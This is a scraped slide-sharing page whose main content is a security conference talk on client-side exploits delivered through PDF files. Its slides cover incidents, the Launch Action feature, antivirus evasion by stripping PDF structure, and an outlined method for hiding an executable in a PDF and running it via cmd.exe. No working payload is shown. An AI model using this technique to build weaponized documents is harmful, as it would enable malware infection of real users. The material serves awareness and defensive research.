[2019] 200만 동접 게임을 위한 MySQL 샤딩[2019] 200만 동접 게임을 위한 MySQL 샤딩
[2019] 200만 동접 게임을 위한 MySQL 샤딩
 
Dockerからcontainerdへの移行
Dockerからcontainerdへの移行Dockerからcontainerdへの移行
Dockerからcontainerdへの移行
 
なかったらINSERTしたいし、あるならロック取りたいやん?
なかったらINSERTしたいし、あるならロック取りたいやん?なかったらINSERTしたいし、あるならロック取りたいやん?
なかったらINSERTしたいし、あるならロック取りたいやん?
 
DAT202_Getting started with Amazon Aurora
DAT202_Getting started with Amazon AuroraDAT202_Getting started with Amazon Aurora
DAT202_Getting started with Amazon Aurora
 
Tools for Metaspace
Tools for MetaspaceTools for Metaspace
Tools for Metaspace
 
Javaのログ出力: 道具と考え方
Javaのログ出力: 道具と考え方Javaのログ出力: 道具と考え方
Javaのログ出力: 道具と考え方
 
Where狙いのキー、order by狙いのキー
Where狙いのキー、order by狙いのキーWhere狙いのキー、order by狙いのキー
Where狙いのキー、order by狙いのキー
 
The linux networking architecture
The linux networking architectureThe linux networking architecture
The linux networking architecture
 
HTTP/2の現状とこれから
HTTP/2の現状とこれからHTTP/2の現状とこれから
HTTP/2の現状とこれから
 

Viewers also liked

Client side exploits
Client side exploitsClient side exploits
Client side exploits
nickyt8
 
Testing web application firewalls (waf) accuracy
Testing web application firewalls (waf) accuracyTesting web application firewalls (waf) accuracy
Testing web application firewalls (waf) accuracy
Ory Segal
 
Evolving Threat Landscape
Evolving Threat LandscapeEvolving Threat Landscape
Evolving Threat Landscape
cygnus0ff
 
Client Side Exploits Using Pdf
Client Side Exploits Using PdfClient Side Exploits Using Pdf
Client Side Exploits Using Pdf
titanlambda
 
The real incident of stealing a droid app+data
The real incident of stealing a droid app+dataThe real incident of stealing a droid app+data
The real incident of stealing a droid app+data
Akash Mahajan
 
The real incident of stealing android app data
The real incident of stealing android app dataThe real incident of stealing android app data
The real incident of stealing android app data
Ankur Bhargava
 
Us 16-subverting apple-graphics_practical_approaches_to_remotely_gaining_root...
Us 16-subverting apple-graphics_practical_approaches_to_remotely_gaining_root...Us 16-subverting apple-graphics_practical_approaches_to_remotely_gaining_root...
Us 16-subverting apple-graphics_practical_approaches_to_remotely_gaining_root...
Liang Chen
 
Router forensics
Router forensicsRouter forensics
Router forensics
Taruna Chauhan
 
Client-side JavaScript Vulnerabilities
Client-side JavaScript VulnerabilitiesClient-side JavaScript Vulnerabilities
Client-side JavaScript Vulnerabilities
Ory Segal
 
JavaScript Security
JavaScript SecurityJavaScript Security
JavaScript Security
Jason Harwig
 
Hacking and securing ios applications
Hacking and securing ios applicationsHacking and securing ios applications
Hacking and securing ios applications
Satish b
 
NCC Group 44Con Workshop: How to assess and secure ios apps
NCC Group 44Con Workshop: How to assess and secure ios appsNCC Group 44Con Workshop: How to assess and secure ios apps
NCC Group 44Con Workshop: How to assess and secure ios apps
NCC Group
 
Alphorm.com Formation Hacking et Sécurité, l'essentiel
Alphorm.com Formation Hacking et Sécurité, l'essentielAlphorm.com Formation Hacking et Sécurité, l'essentiel
Alphorm.com Formation Hacking et Sécurité, l'essentiel
Alphorm
 
JavaScript Security
JavaScript SecurityJavaScript Security
JavaScript Security
Johann-Peter Hartmann
 

Viewers also liked (14)

Client side exploits
Client side exploitsClient side exploits
Client side exploits
 
Testing web application firewalls (waf) accuracy
Testing web application firewalls (waf) accuracyTesting web application firewalls (waf) accuracy
Testing web application firewalls (waf) accuracy
 
Evolving Threat Landscape
Evolving Threat LandscapeEvolving Threat Landscape
Evolving Threat Landscape
 
Client Side Exploits Using Pdf
Client Side Exploits Using PdfClient Side Exploits Using Pdf
Client Side Exploits Using Pdf
 
The real incident of stealing a droid app+data
The real incident of stealing a droid app+dataThe real incident of stealing a droid app+data
The real incident of stealing a droid app+data
 
The real incident of stealing android app data
The real incident of stealing android app dataThe real incident of stealing android app data
The real incident of stealing android app data
 
Us 16-subverting apple-graphics_practical_approaches_to_remotely_gaining_root...
Us 16-subverting apple-graphics_practical_approaches_to_remotely_gaining_root...Us 16-subverting apple-graphics_practical_approaches_to_remotely_gaining_root...
Us 16-subverting apple-graphics_practical_approaches_to_remotely_gaining_root...
 
Router forensics
Router forensicsRouter forensics
Router forensics
 
Client-side JavaScript Vulnerabilities
Client-side JavaScript VulnerabilitiesClient-side JavaScript Vulnerabilities
Client-side JavaScript Vulnerabilities
 
JavaScript Security
JavaScript SecurityJavaScript Security
JavaScript Security
 
Hacking and securing ios applications
Hacking and securing ios applicationsHacking and securing ios applications
Hacking and securing ios applications
 
NCC Group 44Con Workshop: How to assess and secure ios apps
NCC Group 44Con Workshop: How to assess and secure ios appsNCC Group 44Con Workshop: How to assess and secure ios apps
NCC Group 44Con Workshop: How to assess and secure ios apps
 
Alphorm.com Formation Hacking et Sécurité, l'essentiel
Alphorm.com Formation Hacking et Sécurité, l'essentielAlphorm.com Formation Hacking et Sécurité, l'essentiel
Alphorm.com Formation Hacking et Sécurité, l'essentiel
 
JavaScript Security
JavaScript SecurityJavaScript Security
JavaScript Security
 

Similar to Client Side Exploits using PDF

nullcon 2011 - Fuzzing with Complexities
nullcon 2011 - Fuzzing with Complexitiesnullcon 2011 - Fuzzing with Complexities
nullcon 2011 - Fuzzing with Complexities
n|u - The Open Security Community
 
Two-For-One Talk: Malware Analysis for Everyone
Two-For-One Talk: Malware Analysis for EveryoneTwo-For-One Talk: Malware Analysis for Everyone
Two-For-One Talk: Malware Analysis for Everyone
Paul Melson
 
Javascript, DOM, browsers and frameworks basics
Javascript, DOM, browsers and frameworks basicsJavascript, DOM, browsers and frameworks basics
Javascript, DOM, browsers and frameworks basics
Net7
 
VIT351 Software Development VI Unit5
VIT351 Software Development VI Unit5VIT351 Software Development VI Unit5
VIT351 Software Development VI Unit5
YOGESH SINGH
 
C UNIT-5 PREPARED BY M V BRAHMANANDA REDDY
C UNIT-5 PREPARED BY M V BRAHMANANDA REDDYC UNIT-5 PREPARED BY M V BRAHMANANDA REDDY
C UNIT-5 PREPARED BY M V BRAHMANANDA REDDY
Rajeshkumar Reddy
 
Firefox security (prasanna)
Firefox security (prasanna) Firefox security (prasanna)
Firefox security (prasanna)
ClubHack
 
Analysis of malicious pdf
Analysis of malicious pdfAnalysis of malicious pdf
Analysis of malicious pdf
Raghunath G
 
Analysis of malicious pdf
Analysis of malicious pdfAnalysis of malicious pdf
Analysis of malicious pdf
Abdul Adil
 
Firefox-Addons
Firefox-AddonsFirefox-Addons
Firefox-Addons
Mindfire Solutions
 
File Handling.pptx
File Handling.pptxFile Handling.pptx
File Handling.pptx
PragatiSutar4
 
Watir Presentation Sumanth Krishna. A
Watir Presentation Sumanth Krishna. AWatir Presentation Sumanth Krishna. A
Watir Presentation Sumanth Krishna. A
Sumanth krishna
 
file_handling_in_c.ppt
file_handling_in_c.pptfile_handling_in_c.ppt
file_handling_in_c.ppt
DHARUNESHBOOPATHY
 
Firefox Extension Development
Firefox Extension DevelopmentFirefox Extension Development
Firefox Extension Development
phamvanvung
 
Remote File Inclusion / Local File Inclusion [Attack and Defense Techniques]
Remote File Inclusion / Local File Inclusion [Attack and Defense Techniques]Remote File Inclusion / Local File Inclusion [Attack and Defense Techniques]
Remote File Inclusion / Local File Inclusion [Attack and Defense Techniques]
Ismail Tasdelen
 
WPF Deep Dive
WPF Deep DiveWPF Deep Dive
WPF Deep Dive
Aniruddha Chakrabarti
 
Phpconf taiwan-2012
Phpconf taiwan-2012Phpconf taiwan-2012
Phpconf taiwan-2012
Hash Lin
 
iphone presentation
iphone presentationiphone presentation
iphone presentation
Dhananjay Fartyal
 
Defending Workstations - Cyber security webinar part 2
Defending Workstations - Cyber security webinar part 2Defending Workstations - Cyber security webinar part 2
Defending Workstations - Cyber security webinar part 2
F-Secure Corporation
 
Building Desktop RIAs with PHP, HTML & Javascript in AIR
Building Desktop RIAs with PHP, HTML & Javascript in AIRBuilding Desktop RIAs with PHP, HTML & Javascript in AIR
Building Desktop RIAs with PHP, HTML & Javascript in AIR
funkatron
 
iOS (Vulner)ability
iOS (Vulner)abilityiOS (Vulner)ability
iOS (Vulner)ability
Subho Halder
 

Similar to Client Side Exploits using PDF (20)

nullcon 2011 - Fuzzing with Complexities
nullcon 2011 - Fuzzing with Complexitiesnullcon 2011 - Fuzzing with Complexities
nullcon 2011 - Fuzzing with Complexities
 
Two-For-One Talk: Malware Analysis for Everyone
Two-For-One Talk: Malware Analysis for EveryoneTwo-For-One Talk: Malware Analysis for Everyone
Two-For-One Talk: Malware Analysis for Everyone
 
Javascript, DOM, browsers and frameworks basics
Javascript, DOM, browsers and frameworks basicsJavascript, DOM, browsers and frameworks basics
Javascript, DOM, browsers and frameworks basics
 
VIT351 Software Development VI Unit5
VIT351 Software Development VI Unit5VIT351 Software Development VI Unit5
VIT351 Software Development VI Unit5
 
C UNIT-5 PREPARED BY M V BRAHMANANDA REDDY
C UNIT-5 PREPARED BY M V BRAHMANANDA REDDYC UNIT-5 PREPARED BY M V BRAHMANANDA REDDY
C UNIT-5 PREPARED BY M V BRAHMANANDA REDDY
 
Firefox security (prasanna)
Firefox security (prasanna) Firefox security (prasanna)
Firefox security (prasanna)
 
Analysis of malicious pdf
Analysis of malicious pdfAnalysis of malicious pdf
Analysis of malicious pdf
 
Analysis of malicious pdf
Analysis of malicious pdfAnalysis of malicious pdf
Analysis of malicious pdf
 
Firefox-Addons
Firefox-AddonsFirefox-Addons
Firefox-Addons
 
File Handling.pptx
File Handling.pptxFile Handling.pptx
File Handling.pptx
 
Watir Presentation Sumanth Krishna. A
Watir Presentation Sumanth Krishna. AWatir Presentation Sumanth Krishna. A
Watir Presentation Sumanth Krishna. A
 
file_handling_in_c.ppt
file_handling_in_c.pptfile_handling_in_c.ppt
file_handling_in_c.ppt
 
Firefox Extension Development
Firefox Extension DevelopmentFirefox Extension Development
Firefox Extension Development
 
Remote File Inclusion / Local File Inclusion [Attack and Defense Techniques]
Remote File Inclusion / Local File Inclusion [Attack and Defense Techniques]Remote File Inclusion / Local File Inclusion [Attack and Defense Techniques]
Remote File Inclusion / Local File Inclusion [Attack and Defense Techniques]
 
WPF Deep Dive
WPF Deep DiveWPF Deep Dive
WPF Deep Dive
 
Phpconf taiwan-2012
Phpconf taiwan-2012Phpconf taiwan-2012
Phpconf taiwan-2012
 
iphone presentation
iphone presentationiphone presentation
iphone presentation
 
Defending Workstations - Cyber security webinar part 2
Defending Workstations - Cyber security webinar part 2Defending Workstations - Cyber security webinar part 2
Defending Workstations - Cyber security webinar part 2
 
Building Desktop RIAs with PHP, HTML & Javascript in AIR
Building Desktop RIAs with PHP, HTML & Javascript in AIRBuilding Desktop RIAs with PHP, HTML & Javascript in AIR
Building Desktop RIAs with PHP, HTML & Javascript in AIR
 
iOS (Vulner)ability
iOS (Vulner)abilityiOS (Vulner)ability
iOS (Vulner)ability
 

More from n|u - The Open Security Community

Hardware security testing 101 (Null - Delhi Chapter)
Hardware security testing 101 (Null - Delhi Chapter)Hardware security testing 101 (Null - Delhi Chapter)
Hardware security testing 101 (Null - Delhi Chapter)
n|u - The Open Security Community
 
Osint primer
Osint primerOsint primer
Osint primer
n|u - The Open Security Community
 
SSRF exploit the trust relationship
SSRF exploit the trust relationshipSSRF exploit the trust relationship
SSRF exploit the trust relationship
n|u - The Open Security Community
 
Nmap basics
Nmap basicsNmap basics
Nmap basics
n|u - The Open Security Community
 
Metasploit primary
Metasploit primaryMetasploit primary
Metasploit primary
n|u - The Open Security Community
 
Api security-testing
Api security-testingApi security-testing
Api security-testing
n|u - The Open Security Community
 
Introduction to TLS 1.3
Introduction to TLS 1.3Introduction to TLS 1.3
Introduction to TLS 1.3
n|u - The Open Security Community
 
Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...
Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...
Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...
n|u - The Open Security Community
 
Talking About SSRF,CRLF
Talking About SSRF,CRLFTalking About SSRF,CRLF
Talking About SSRF,CRLF
n|u - The Open Security Community
 
Building active directory lab for red teaming
Building active directory lab for red teamingBuilding active directory lab for red teaming
Building active directory lab for red teaming
n|u - The Open Security Community
 
Owning a company through their logs
Owning a company through their logsOwning a company through their logs
Owning a company through their logs
n|u - The Open Security Community
 
Introduction to shodan
Introduction to shodanIntroduction to shodan
Introduction to shodan
n|u - The Open Security Community
 
Cloud security
Cloud security Cloud security
Cloud security
n|u - The Open Security Community
 
Detecting persistence in windows
Detecting persistence in windowsDetecting persistence in windows
Detecting persistence in windows
n|u - The Open Security Community
 
Frida - Objection Tool Usage
Frida - Objection Tool UsageFrida - Objection Tool Usage
Frida - Objection Tool Usage
n|u - The Open Security Community
 
OSQuery - Monitoring System Process
OSQuery - Monitoring System ProcessOSQuery - Monitoring System Process
OSQuery - Monitoring System Process
n|u - The Open Security Community
 
DevSecOps Jenkins Pipeline -Security
DevSecOps Jenkins Pipeline -SecurityDevSecOps Jenkins Pipeline -Security
DevSecOps Jenkins Pipeline -Security
n|u - The Open Security Community
 
Extensible markup language attacks
Extensible markup language attacksExtensible markup language attacks
Extensible markup language attacks
n|u - The Open Security Community
 
Linux for hackers
Linux for hackersLinux for hackers
Linux for hackers
n|u - The Open Security Community
 
Android Pentesting
Android PentestingAndroid Pentesting
Android Pentesting
n|u - The Open Security Community
 

More from n|u - The Open Security Community (20)

Hardware security testing 101 (Null - Delhi Chapter)
Hardware security testing 101 (Null - Delhi Chapter)Hardware security testing 101 (Null - Delhi Chapter)
Hardware security testing 101 (Null - Delhi Chapter)
 
Osint primer
Osint primerOsint primer
Osint primer
 
SSRF exploit the trust relationship
SSRF exploit the trust relationshipSSRF exploit the trust relationship
SSRF exploit the trust relationship
 
Nmap basics
Nmap basicsNmap basics
Nmap basics
 
Metasploit primary
Metasploit primaryMetasploit primary
Metasploit primary
 
Api security-testing
Api security-testingApi security-testing
Api security-testing
 
Introduction to TLS 1.3
Introduction to TLS 1.3Introduction to TLS 1.3
Introduction to TLS 1.3
 
Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...
Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...
Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...
 
Talking About SSRF,CRLF
Talking About SSRF,CRLFTalking About SSRF,CRLF
Talking About SSRF,CRLF
 
Building active directory lab for red teaming
Building active directory lab for red teamingBuilding active directory lab for red teaming
Building active directory lab for red teaming
 
Owning a company through their logs
Owning a company through their logsOwning a company through their logs
Owning a company through their logs
 
Introduction to shodan
Introduction to shodanIntroduction to shodan
Introduction to shodan
 
Cloud security
Cloud security Cloud security
Cloud security
 
Detecting persistence in windows
Detecting persistence in windowsDetecting persistence in windows
Detecting persistence in windows
 
Frida - Objection Tool Usage
Frida - Objection Tool UsageFrida - Objection Tool Usage
Frida - Objection Tool Usage
 
OSQuery - Monitoring System Process
OSQuery - Monitoring System ProcessOSQuery - Monitoring System Process
OSQuery - Monitoring System Process
 
DevSecOps Jenkins Pipeline -Security
DevSecOps Jenkins Pipeline -SecurityDevSecOps Jenkins Pipeline -Security
DevSecOps Jenkins Pipeline -Security
 
Extensible markup language attacks
Extensible markup language attacksExtensible markup language attacks
Extensible markup language attacks
 
Linux for hackers
Linux for hackersLinux for hackers
Linux for hackers
 
Android Pentesting
Android PentestingAndroid Pentesting
Android Pentesting
 

Recently uploaded

"Scaling RAG Applications to serve millions of users", Kevin Goedecke
"Scaling RAG Applications to serve millions of users", Kevin Goedecke"Scaling RAG Applications to serve millions of users", Kevin Goedecke
"Scaling RAG Applications to serve millions of users", Kevin Goedecke
Fwdays
 
Containers & AI - Beauty and the Beast!?!
Containers & AI - Beauty and the Beast!?!Containers & AI - Beauty and the Beast!?!
Containers & AI - Beauty and the Beast!?!
Tobias Schneck
 
QR Secure: A Hybrid Approach Using Machine Learning and Security Validation F...
QR Secure: A Hybrid Approach Using Machine Learning and Security Validation F...QR Secure: A Hybrid Approach Using Machine Learning and Security Validation F...
QR Secure: A Hybrid Approach Using Machine Learning and Security Validation F...
AlexanderRichford
 
Harnessing the Power of NLP and Knowledge Graphs for Opioid Research
Harnessing the Power of NLP and Knowledge Graphs for Opioid ResearchHarnessing the Power of NLP and Knowledge Graphs for Opioid Research
Harnessing the Power of NLP and Knowledge Graphs for Opioid Research
Neo4j
 
Lee Barnes - Path to Becoming an Effective Test Automation Engineer.pdf
Lee Barnes - Path to Becoming an Effective Test Automation Engineer.pdfLee Barnes - Path to Becoming an Effective Test Automation Engineer.pdf
Lee Barnes - Path to Becoming an Effective Test Automation Engineer.pdf
leebarnesutopia
 
Poznań ACE event - 19.06.2024 Team 24 Wrapup slidedeck
Poznań ACE event - 19.06.2024 Team 24 Wrapup slidedeckPoznań ACE event - 19.06.2024 Team 24 Wrapup slidedeck
Poznań ACE event - 19.06.2024 Team 24 Wrapup slidedeck
FilipTomaszewski5
 
[OReilly Superstream] Occupy the Space: A grassroots guide to engineering (an...
[OReilly Superstream] Occupy the Space: A grassroots guide to engineering (an...[OReilly Superstream] Occupy the Space: A grassroots guide to engineering (an...
[OReilly Superstream] Occupy the Space: A grassroots guide to engineering (an...
Jason Yip
 
"NATO Hackathon Winner: AI-Powered Drug Search", Taras Kloba
"NATO Hackathon Winner: AI-Powered Drug Search", Taras Kloba"NATO Hackathon Winner: AI-Powered Drug Search", Taras Kloba
"NATO Hackathon Winner: AI-Powered Drug Search", Taras Kloba
Fwdays
 
Y-Combinator seed pitch deck template PP
Y-Combinator seed pitch deck template PPY-Combinator seed pitch deck template PP
Y-Combinator seed pitch deck template PP
c5vrf27qcz
 
inQuba Webinar Mastering Customer Journey Management with Dr Graham Hill
inQuba Webinar Mastering Customer Journey Management with Dr Graham HillinQuba Webinar Mastering Customer Journey Management with Dr Graham Hill
inQuba Webinar Mastering Customer Journey Management with Dr Graham Hill
LizaNolte
 
ScyllaDB Tablets: Rethinking Replication
ScyllaDB Tablets: Rethinking ReplicationScyllaDB Tablets: Rethinking Replication
ScyllaDB Tablets: Rethinking Replication
ScyllaDB
 
Dandelion Hashtable: beyond billion requests per second on a commodity server
Dandelion Hashtable: beyond billion requests per second on a commodity serverDandelion Hashtable: beyond billion requests per second on a commodity server
Dandelion Hashtable: beyond billion requests per second on a commodity server
Antonios Katsarakis
 
Christine's Supplier Sourcing Presentaion.pptx
Christine's Supplier Sourcing Presentaion.pptxChristine's Supplier Sourcing Presentaion.pptx
Christine's Supplier Sourcing Presentaion.pptx
christinelarrosa
 
AWS Certified Solutions Architect Associate (SAA-C03)
AWS Certified Solutions Architect Associate (SAA-C03)AWS Certified Solutions Architect Associate (SAA-C03)
AWS Certified Solutions Architect Associate (SAA-C03)
HarpalGohil4
 
Leveraging the Graph for Clinical Trials and Standards
Leveraging the Graph for Clinical Trials and StandardsLeveraging the Graph for Clinical Trials and Standards
Leveraging the Graph for Clinical Trials and Standards
Neo4j
 
"Choosing proper type of scaling", Olena Syrota
"Choosing proper type of scaling", Olena Syrota"Choosing proper type of scaling", Olena Syrota
"Choosing proper type of scaling", Olena Syrota
Fwdays
 
Northern Engraving | Nameplate Manufacturing Process - 2024
Northern Engraving | Nameplate Manufacturing Process - 2024Northern Engraving | Nameplate Manufacturing Process - 2024
Northern Engraving | Nameplate Manufacturing Process - 2024
Northern Engraving
 
Northern Engraving | Modern Metal Trim, Nameplates and Appliance Panels
Northern Engraving | Modern Metal Trim, Nameplates and Appliance PanelsNorthern Engraving | Modern Metal Trim, Nameplates and Appliance Panels
Northern Engraving | Modern Metal Trim, Nameplates and Appliance Panels
Northern Engraving
 
"Frontline Battles with DDoS: Best practices and Lessons Learned", Igor Ivaniuk
"Frontline Battles with DDoS: Best practices and Lessons Learned", Igor Ivaniuk"Frontline Battles with DDoS: Best practices and Lessons Learned", Igor Ivaniuk
"Frontline Battles with DDoS: Best practices and Lessons Learned", Igor Ivaniuk
Fwdays
 
Mutation Testing for Task-Oriented Chatbots
Mutation Testing for Task-Oriented ChatbotsMutation Testing for Task-Oriented Chatbots
Mutation Testing for Task-Oriented Chatbots
Pablo Gómez Abajo
 

Recently uploaded (20)

"Scaling RAG Applications to serve millions of users", Kevin Goedecke
"Scaling RAG Applications to serve millions of users", Kevin Goedecke"Scaling RAG Applications to serve millions of users", Kevin Goedecke
"Scaling RAG Applications to serve millions of users", Kevin Goedecke
 
Containers & AI - Beauty and the Beast!?!
Containers & AI - Beauty and the Beast!?!Containers & AI - Beauty and the Beast!?!
Containers & AI - Beauty and the Beast!?!
 
QR Secure: A Hybrid Approach Using Machine Learning and Security Validation F...
QR Secure: A Hybrid Approach Using Machine Learning and Security Validation F...QR Secure: A Hybrid Approach Using Machine Learning and Security Validation F...
QR Secure: A Hybrid Approach Using Machine Learning and Security Validation F...
 
Harnessing the Power of NLP and Knowledge Graphs for Opioid Research
Harnessing the Power of NLP and Knowledge Graphs for Opioid ResearchHarnessing the Power of NLP and Knowledge Graphs for Opioid Research
Harnessing the Power of NLP and Knowledge Graphs for Opioid Research
 
Lee Barnes - Path to Becoming an Effective Test Automation Engineer.pdf
Lee Barnes - Path to Becoming an Effective Test Automation Engineer.pdfLee Barnes - Path to Becoming an Effective Test Automation Engineer.pdf
Lee Barnes - Path to Becoming an Effective Test Automation Engineer.pdf
 
Poznań ACE event - 19.06.2024 Team 24 Wrapup slidedeck
Poznań ACE event - 19.06.2024 Team 24 Wrapup slidedeckPoznań ACE event - 19.06.2024 Team 24 Wrapup slidedeck
Poznań ACE event - 19.06.2024 Team 24 Wrapup slidedeck
 
[OReilly Superstream] Occupy the Space: A grassroots guide to engineering (an...
[OReilly Superstream] Occupy the Space: A grassroots guide to engineering (an...[OReilly Superstream] Occupy the Space: A grassroots guide to engineering (an...
[OReilly Superstream] Occupy the Space: A grassroots guide to engineering (an...
 
"NATO Hackathon Winner: AI-Powered Drug Search", Taras Kloba
"NATO Hackathon Winner: AI-Powered Drug Search", Taras Kloba"NATO Hackathon Winner: AI-Powered Drug Search", Taras Kloba
"NATO Hackathon Winner: AI-Powered Drug Search", Taras Kloba
 
Y-Combinator seed pitch deck template PP
Y-Combinator seed pitch deck template PPY-Combinator seed pitch deck template PP
Y-Combinator seed pitch deck template PP
 
inQuba Webinar Mastering Customer Journey Management with Dr Graham Hill
inQuba Webinar Mastering Customer Journey Management with Dr Graham HillinQuba Webinar Mastering Customer Journey Management with Dr Graham Hill
inQuba Webinar Mastering Customer Journey Management with Dr Graham Hill
 
ScyllaDB Tablets: Rethinking Replication
ScyllaDB Tablets: Rethinking ReplicationScyllaDB Tablets: Rethinking Replication
ScyllaDB Tablets: Rethinking Replication
 
Dandelion Hashtable: beyond billion requests per second on a commodity server
Dandelion Hashtable: beyond billion requests per second on a commodity serverDandelion Hashtable: beyond billion requests per second on a commodity server
Dandelion Hashtable: beyond billion requests per second on a commodity server
 
Christine's Supplier Sourcing Presentaion.pptx
Christine's Supplier Sourcing Presentaion.pptxChristine's Supplier Sourcing Presentaion.pptx
Christine's Supplier Sourcing Presentaion.pptx
 
AWS Certified Solutions Architect Associate (SAA-C03)
AWS Certified Solutions Architect Associate (SAA-C03)AWS Certified Solutions Architect Associate (SAA-C03)
AWS Certified Solutions Architect Associate (SAA-C03)
 
Leveraging the Graph for Clinical Trials and Standards
Leveraging the Graph for Clinical Trials and StandardsLeveraging the Graph for Clinical Trials and Standards
Leveraging the Graph for Clinical Trials and Standards
 
"Choosing proper type of scaling", Olena Syrota
"Choosing proper type of scaling", Olena Syrota"Choosing proper type of scaling", Olena Syrota
"Choosing proper type of scaling", Olena Syrota
 
Northern Engraving | Nameplate Manufacturing Process - 2024
Northern Engraving | Nameplate Manufacturing Process - 2024Northern Engraving | Nameplate Manufacturing Process - 2024
Northern Engraving | Nameplate Manufacturing Process - 2024
 
Northern Engraving | Modern Metal Trim, Nameplates and Appliance Panels
Northern Engraving | Modern Metal Trim, Nameplates and Appliance PanelsNorthern Engraving | Modern Metal Trim, Nameplates and Appliance Panels
Northern Engraving | Modern Metal Trim, Nameplates and Appliance Panels
 
"Frontline Battles with DDoS: Best practices and Lessons Learned", Igor Ivaniuk
"Frontline Battles with DDoS: Best practices and Lessons Learned", Igor Ivaniuk"Frontline Battles with DDoS: Best practices and Lessons Learned", Igor Ivaniuk
"Frontline Battles with DDoS: Best practices and Lessons Learned", Igor Ivaniuk
 
Mutation Testing for Task-Oriented Chatbots
Mutation Testing for Task-Oriented ChatbotsMutation Testing for Task-Oriented Chatbots
Mutation Testing for Task-Oriented Chatbots
 

Client Side Exploits using PDF

  • 1. BY, ANKUR BHARGAVA (INFOSYS TECHNOLOGIES LIMITED) TAMAGHNA BASU (SECURITY RESEARCHER) Client Side Exploits using PDF C0C0N Security & Hacking Conference
  • 3. About PDF • What isPDF? • Incidentsin thewild • Why pdf attcks? • PDF document structure
  • 4. Potentially Dangerous File / Penetration Document Format Stands for Adobe Portable Document Format Exchange and manipulation of electronic data reliable and platform independent Has become most widespread and used document description format throughout the world
  • 5. Adobe PDF – As a programming language PDF document is more than a powerful document format Has a complete programming language of its own Dedicated to document creation and manipulation Relatively strong execution features
  • 6. Adobe PDF – Security Issues
  • 9. Incidents in the wild  Jun 14 CVE-2010-1297 PDF Adobe 0-Day WEO from sacchetti.dana@gmail.com  Jun 20 CVE-2010-1297 PDF Meeting agenda from alexis.mo88@gmail.com  Jun 21 CVE-2010-1297 PDF About the recent US-Japan Economic Relations  Jun 21 CVE-2010-1297 PDF Adobe 0-Day About the recent US-Japan Economic Relations - with Poison Ivy  Jun 27 CVE-2009-0927 PDF Discussion on cross-strait maritime cooperation  Jul 6 CVE-2010-1297 PDF EPA's Water Sampling Report from spoofed OCSPP@epa.go  Jul 14 CVE-2009-4324 PDF President Obama's Detrimental Deadlines
  • 10. The Reign of Zeus:  Zeus (also known as Zbot, PRG, Wsnpoem, Gorhax and Kneber) is a Trojan horse that steals banking information by keystroke logging.  Found in July 2007 when it was used to steal information from the United States Department of Transportation. It became more widespread in March 2009.  In June 2009, security company Prevx discovered that Zeus had compromised over 74,000 FTP accounts on websites of companies like: Bank of America, NASA, Monster, ABC, Oracle, Cisco, Amazon, BusinessWeek  ZeuS is sold in the criminal underground as a kit for around $3000-$4000, and is likely the one malware most utilized by criminals specializing in financial fraud. ZeuS has evolved over time and includes a full arsenal of information stealing .
  • 11. The Reign of Zeus A recent breakthrough in spreading Zeus via PDF files threatens to further the spread of Zeus. The pdf file (detected as Exploit.JS.Pdfka.bui) contained an exploit for the CVE-2010- 0188 vulnerability - buffer overflow – manifests itself when the field containing the image is accessed. CVE-2010-0188 exploits statistics 2010
  • 13. Apple iPhone / iPad / iPod Code Execution and Sandbox Bypass VUPEN ID - VUPEN/ADV-2010-1992 Release date - 2010-08-03 It is caused by a memory corruption error when processing Compact Font Format (CFF) data within a PDF document, which could be exploited by attackers to execute arbitrary code by tricking a user into visiting a specially crafted web page using Mobile Safari
  • 14. Why PDF Popularity and usability Flexibility, platform independent, rich text Trust level is high on pdf – static piece of information Rich api, easy to exploit / misuse Dominance of Adobe reader, huge scope for attack
  • 15. PDF document structure The general structure of a PDF file is composed of the following code components: header, body, cross- reference (xref) table, and trailer, as shown in figure 1.
  • 16. PDF Document Structure PDF Header Objects Trailer Body Cross reference Table
  • 17. Launch Action • Launch Action Api • SomeExamples • Evading Antivirus • With embedded EXE
  • 18. Launch Action Vulnerability A launch action launches an application or opens or prints a document. Following are the action dictionary entries specific to this type of action.  ENTRIES  S :Name Required) The type of action that this dictionary describes; shall be Launch for a launch action.  F: File specification (Required if none of the entries Win, Mac, or Unix is present) The application that shall be launched or the document that shall be opened or printed. If this entry is absent and the conforming reader does not understand any of the alternative entries, it shall do nothing.  Win : dictionary (Optional) A dictionary containing Windows-specific launch parameters.
  • 19. Launch Action Vulnerability  PARAMETERS  F : byte string (Required) The file name of the application that shall be launched or the document that shall be opened or printed, in standard Windows pathname format. If the name string includes a backslash character (), the backslash shall itself be preceded by a backslash. This value shall be a simple string; it is not a file specification.  P : byte string (Optional) A parameter string that shall be passed to the application designated by the F entry. This entry shall be omitted if F designates a document.
  • 20. Launch Action Vulnerability Open command prompt Open website
  • 24. Launch Action Vulnerability Confidential Data!! If You are Authorized Click on 'Open'. Check 'Do Not Show This Message Again' to avoid this dialog next time
  • 28. Evading Antivirus by Changing the format You can take any other PDF data type and give it a number by wrapping it in "obj" and "endobj". Then later on, when you want to use that chunk of data, you can reference it, by number, with the "R" operator. These two examples are equivalent to Acrobat 2 0 obj (Hello World) Endobj 3 0 obj << /Example 2 0 R >> Endobj 3 0 obj << /Example (Hello World) >> endobj
  • 29. Evading Antivirus  What You Can Leave Out  All Page data  All Whitespace, except for End-Of-Line after comments  The version number part of %PDF-1.1  The %%EOF  The xref table  And thus also startxref  Most Object /Types  So what's actually required?  %PDF-anything, but if the file is too confusing for Acrobat, you need at least the first number. Like %PDF-1.  A trailer with a /Root dictionary for the Catalog  A /Pages dictionary, but this can be empty, just as long as it's a dictionary type.  An /OpenAction if you want to launch your Javascript upon file open.  The Javascript Action.
  • 32. POC: Launching an Embedded exe Step 1 : Embed the hex content of the exe in a vbscript which extracts it out to the file system and runs it. Step 2 : Embed that vbscript in the pdf file as comments. Step 3 : Launch cmd.exe and create another script which extracts out the main vbscript from the pdf and run them both.
